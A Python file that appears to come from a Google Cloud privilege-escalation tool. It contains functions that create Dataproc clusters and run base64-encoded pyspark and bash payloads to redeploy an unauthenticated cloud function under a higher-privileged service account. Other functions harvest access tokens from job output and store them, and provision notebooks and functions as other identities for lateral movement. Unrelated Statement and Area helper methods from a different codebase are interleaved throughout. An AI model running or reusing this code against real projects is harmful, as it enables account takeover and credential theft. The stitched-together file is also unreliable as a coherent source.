def dataproc_privesc(dest_proj, latest_cf, func_details):
    """Escalate privileges by abusing a cloud-platform-scoped Dataproc cluster.

    Creates a Dataproc cluster whose instance metadata carries the target
    cloud-function name/password, then submits a pyspark job that (1) drops
    the base cloud-function source onto the worker and (2) runs a bash
    deploy script which redeploys that function under the project's compute
    default service account. The cluster is deleted afterwards.

    :param dest_proj: destination project (currently unused by this body)
    :param latest_cf: source text of the cloud function to deploy
    :param func_details: dict with "name" and "evil_password" keys
    """
    cluster_name = utils.random_name()
    # Cluster metadata smuggles the function name/password to the worker VM.
    utils.run_gcloud_command_local(
        "gcloud dataproc clusters create {} --region us-central1 --scopes cloud-platform --metadata cf_name={},evilpassword={}"
        .format(cluster_name, func_details["name"], func_details["evil_password"]))

    # Bash payload executed on the worker: resolves its own metadata and
    # redeploys the cloud function as the compute default service account.
    deploy_script = """#!/bin/bash
PROJECT=$(gcloud config get-value project)
PROJECT_NUMBER=$(gcloud projects list --filter="$PROJECT" --format="value(PROJECT_NUMBER)")
DEST_SA="[email protected]"
INSTANCE_ID=$(curl http://metadata.google.internal/computeMetadata/v1/instance/id -H "Metadata-Flavor: Google")
ZONE=$(curl http://metadata.google.internal/computeMetadata/v1/instance/zone -H "Metadata-Flavor: Google")
CF_NAME=$(gcloud compute instances describe $INSTANCE_ID --zone $ZONE --format='value[](metadata.items.cf_name)')
CF_PASSWORD=$(gcloud compute instances describe $INSTANCE_ID --zone $ZONE --format='value[](metadata.items.evilpassword)')
gcloud services enable cloudfunctions.googleapis.com
gcloud functions deploy $CF_NAME --set-env-vars=EVIL_PASSWORD=$CF_PASSWORD --timeout 540 --trigger-http --allow-unauthenticated --source /tmp/base_cloud_function --runtime python37 --entry-point hello_world --service-account $DEST_SA"""

    # Both payloads travel base64-encoded so they survive shell quoting.
    cf_b64 = b64encode(latest_cf.encode("utf-8")).decode("utf-8")
    bash_b64 = b64encode(deploy_script.encode("utf-8")).decode("utf-8")

    # The pyspark job itself: write the function source, then run the script.
    job_source = (
        "import subprocess\n\nimport os\n\n"
        "os.system(\"mkdir /tmp/base_cloud_function && echo \\\""
        + cf_b64
        + "\\\" | base64 -d > /tmp/base_cloud_function/main.py\")"
        + "\n\nos.system(\"/bin/bash -c \\\"base64 -d <<< "
        + bash_b64
        + " | /bin/bash\\\"\")"
    )
    print(job_source)

    with open("/tmp/sparkjob.py", "w+") as f:
        f.write(job_source)

    utils.run_gcloud_command_local(
        "gcloud dataproc jobs submit pyspark --cluster {} /tmp/sparkjob.py --region us-central1"
        .format(cluster_name))
    utils.run_gcloud_command_local(
        "gcloud dataproc clusters delete {} --region us-central1 --quiet"
        .format(cluster_name))
def recurse(self, sign):
    """Return a new Statement that chains this one through a recursion *sign*.

    The new statement reuses this statement's sub-statements and named
    areas, and records one extra operation mapping its fresh random name
    to ``[this_name, sign, None]``.
    """
    new_name = utils.random_name()
    ops = dict(self._operation)
    ops[new_name] = [self._name, sign, None]
    return Statement(new_name, self._statement, ops, self._named_areas)
def __init__(self, coords, out):
    """
    :param coords: list of coord tuples (lon, lat) describing the area
    :param out: output specification for the area
                (opaque here; stored as-is — confirm expected format
                against callers)
    """
    # NOTE(review): the previous docstring documented a nonexistent
    # ``name`` parameter; the internal name is generated randomly below.
    self.coords = coords
    self.out = out
    self._name = utils.random_name()
def dataproc(source_name=None, project=None, refresh=False):
    """Spin up a Dataproc cluster, run ``dataproc_job.py`` on it, and harvest
    the access token the job prints.

    :param source_name: if given, run the gcloud commands through the stored
        CloudObject of that name (via ``run_cmd_on_source``); otherwise run
        them with the local gcloud identity.
    :param project: project passed through to ``run_cmd_on_source`` and
        stored on the resulting CloudObject.
    :param refresh: falsy to create and persist a new CloudObject; otherwise
        an existing CloudObject whose ``cred`` is refreshed in place.
    :returns: the persisted (new or refreshed) CloudObject.
    :raises RuntimeError: if the job output contains no access_token line.
    """
    cluster_name = utils.random_name()
    if not source_name:
        caller_identity = utils.run_gcloud_command_local(
            "gcloud auth print-identity-token")
        creator_email = ""
        utils.run_gcloud_command_local(
            "gcloud dataproc clusters create {} --region us-central1 --scopes cloud-platform"
            .format(cluster_name))
        raw_output = utils.run_gcloud_command_local(
            "gcloud dataproc jobs submit pyspark --cluster {} dataproc_job.py --region us-central1"
            .format(cluster_name))
        utils.run_gcloud_command_local(
            "gcloud dataproc clusters delete {} --region us-central1 --quiet".
            format(cluster_name))
    else:
        source = db_session.query(
            models.CloudObject).filter_by(name=source_name).first()
        caller_identity = source.identity
        creator_email = source.serviceAccount
        run_cmd_on_source(
            source_name,
            "gcloud dataproc clusters create {} --region us-central1 --scopes cloud-platform"
            .format(cluster_name), project)
        raw_output = run_cmd_on_source(
            source_name,
            "gcloud dataproc jobs submit pyspark --cluster {} dataproc_job.py --region us-central1"
            .format(cluster_name), project)
        run_cmd_on_source(
            source_name,
            "gcloud dataproc clusters delete {} --region us-central1 --quiet".
            format(cluster_name), project)
    print(raw_output)
    # The job prints a JSON line containing the harvested token; keep the
    # last such line (matches previous behavior when several appear).
    token = None
    for line in raw_output.split("\n"):
        if "access_token" in line:
            token = json.loads(line)
    if token is None:
        # Previously this fell through to a bare NameError on ``token``.
        raise RuntimeError(
            "no access_token found in Dataproc job output for cluster {}"
            .format(cluster_name))
    if not refresh:
        fun_cloud_function = models.CloudObject(
            project=project,
            role="editor",
            serviceAccount=token["service_account"],
            evilPassword="******",
            name=cluster_name,
            cred=token["access_token"],
            creator_identity=caller_identity,
            creator_email=creator_email,
            infastructure="dataproc",
            identity=token["identity"])
        db_session.add(fun_cloud_function)
        db_session.commit()
        return fun_cloud_function
    else:
        refresh.cred = token["access_token"]
        db_session.add(refresh)
        db_session.commit()
        return refresh
def _constructor(cls, typ, area, tags=None, name=None):
    """Build a *cls* instance selecting *typ* elements within *area*.

    *area* may be a Statement (its statements become the named area), an
    Area (wrapped into a single-entry named area), or a plain value used
    directly in the statement. A random name is generated when *name* is
    not supplied.
    """
    if name is None:
        name = utils.random_name()
    if isinstance(area, Statement):
        return cls(name, {name: [typ, area._name, tags]},
                   named_area=area._statement)
    if isinstance(area, Area):
        return cls(name, {name: [typ, area._name, tags]},
                   named_area={area._name: [typ, area, None]})
    # Plain area value: embed it directly in the statement.
    return cls(name, {name: [typ, area, tags]})
def deploy_notebook(project, source=None, target=None, bucket=None,
                    role="unknown", bucketproj=None):
    """Provision a notebook VM in *project* running as *target* and record it.

    Creates the instance via ``base_notebook.create_notebook_in_another_project``
    (SSH commands via the VM are used for lateral movement; a cron job pulls
    a token every minute and pushes it up). When *source* is given, its
    stored credential is refreshed and the calls are tunneled through the
    sketch proxy.

    :param project: project to create the notebook in (also set locally).
    :param source: name of a stored CloudObject to act through, or None to
        use the local gcloud identity.
    :param target: service account to run as; defaults to the project's
        appspot SA (and forces role to "editor").
    :param bucket: staging bucket passed to the notebook creator.
    :param role: role label recorded on the resulting CloudObject.
    :param bucketproj: project of *bucket*, used when refreshing *source*.
    :returns: the persisted CloudObject, or False on provisioning failure.
    """
    utils.run_gcloud_command_local(
        "gcloud config set project {}".format(project))
    instance_props = {"name": utils.random_name()}
    if not target:
        target = "{}@appspot.gserviceaccount.com".format(project)
        role = "editor"
    if not source:
        utils.run_gcloud_command_local(
            "gcloud services enable cloudresourcemanager.googleapis.com")
        caller_identity = utils.run_gcloud_command_local(
            "gcloud auth print-identity-token")
        success = base_notebook.create_notebook_in_another_project(
            project, target, instance_props, bucket)
        if not success or success == "False":
            print("Failed to provision VM")
            return False
        creator_email = ""
    else:
        source = db_session.query(
            models.CloudObject).filter_by(name=source).first()
        source.refresh_cred(db_session,
                            utils.run_gcloud_command_local,
                            dataproc=dataproc,
                            bucket_name=bucket,
                            bucket_proj=bucketproj)
        caller_identity = source.identity
        token = source.cred
        proc = activate_sketch_proxy(token)
        # Ensure the proxy is torn down even if provisioning raises
        # (previously an exception here leaked the proxy process).
        try:
            utils.run_gcloud_command_local(
                "gcloud services enable cloudresourcemanager.googleapis.com")
            success = base_notebook.create_notebook_in_another_project(
                project, target, instance_props, bucket)
        finally:
            deactivate_sketch_proxy(proc)
        if not success or success == "False":
            print("Failed to provision dataflow notebook VM")
            return False
        creator_email = source.serviceAccount
    fun_notebook_instance = models.CloudObject(
        project=project,
        role=role,
        serviceAccount=target,
        evilPassword="",
        name=instance_props["name"],
        cred="",
        creator_identity=caller_identity,
        creator_email=creator_email,
        infastructure="notebook",
        identity="")
    db_session.add(fun_notebook_instance)
    db_session.commit()
    # Typo fix: "identitiy" -> "identity" in the success message.
    print("successfully privesced the {} identity".format(target))
    return fun_notebook_instance
def deploy_cf(project, source=None, target=None, role="unknown",
              bucket=None, bucketproj=None):
    """Deploy the base cloud function in *project* running as *target* and
    record it.

    Reads ``./base_cloud_function/main.py`` and deploys it via
    ``base_cf.create_gcf_in_another_project`` with a random name and
    "evil password". When *source* is given, its stored credential is
    refreshed and the calls are tunneled through the sketch proxy.

    :param project: project to deploy the function in (also set locally).
    :param source: name of a stored CloudObject to act through, or None to
        use the local gcloud identity.
    :param target: service account to run as; defaults to the project's
        appspot SA (and forces role to "editor").
    :param role: role label recorded on the resulting CloudObject.
    :param bucket: bucket passed through when refreshing *source*.
    :param bucketproj: project of *bucket*, used when refreshing *source*.
    :returns: the persisted CloudObject, or False on provisioning failure.
    """
    with open("./base_cloud_function/main.py") as f:
        latest_cf = f.read()
    utils.run_gcloud_command_local(
        "gcloud config set project {}".format(project))
    function_props = {
        "name": utils.random_name(),
        "evil_password": utils.random_name()
    }
    if not target:
        target = "{}@appspot.gserviceaccount.com".format(project)
        role = "editor"
    if not source:
        utils.run_gcloud_command_local(
            "gcloud services enable cloudresourcemanager.googleapis.com")
        caller_identity = utils.run_gcloud_command_local(
            "gcloud auth print-identity-token")
        success = base_cf.create_gcf_in_another_project(
            project, target, latest_cf, function_props)
        if not success or success == "False":
            print("Failed to provision CF")
            return False
        creator_email = ""
    else:
        source = db_session.query(
            models.CloudObject).filter_by(name=source).first()
        source.refresh_cred(db_session,
                            utils.run_gcloud_command_local,
                            dataproc=dataproc,
                            bucket_name=bucket,
                            bucket_proj=bucketproj)
        caller_identity = source.identity
        token = source.cred
        proc = activate_sketch_proxy(token)
        # Ensure the proxy is torn down even if provisioning raises
        # (previously an exception here leaked the proxy process).
        try:
            utils.run_gcloud_command_local(
                "gcloud services enable cloudresourcemanager.googleapis.com")
            success = base_cf.create_gcf_in_another_project(
                project, target, latest_cf, function_props)
        finally:
            deactivate_sketch_proxy(proc)
        if not success or success == "False":
            print("Failed to provision CF")
            return False
        creator_email = source.serviceAccount
    fun_cloud_function = models.CloudObject(
        project=project,
        role=role,
        serviceAccount=target,
        evilPassword=function_props["evil_password"],
        name=function_props["name"],
        cred="",
        creator_identity=caller_identity,
        creator_email=creator_email,
        infastructure="cloud_function",
        identity="")
    db_session.add(fun_cloud_function)
    db_session.commit()
    # Typo fix: "identitiy" -> "identity" in the success message.
    print("successfully privesced the {} identity".format(target))
    return fun_cloud_function
def _operation(self, other, sign):
    """Merge this statement with *other* under the operator *sign*.

    Returns a tuple ``(name, named_area, statement, operation)`` where the
    named areas and statements of both operands are merged (``other``
    winning key collisions, as before) and the operation is produced by
    ``Statement._make_operation``.
    """
    result_name = utils.random_name()
    areas = dict(self._named_areas)
    areas.update(other._named_areas)
    statements = dict(self._statement)
    statements.update(other._statement)
    op = Statement._make_operation(self, other, result_name, sign)
    return result_name, areas, statements, op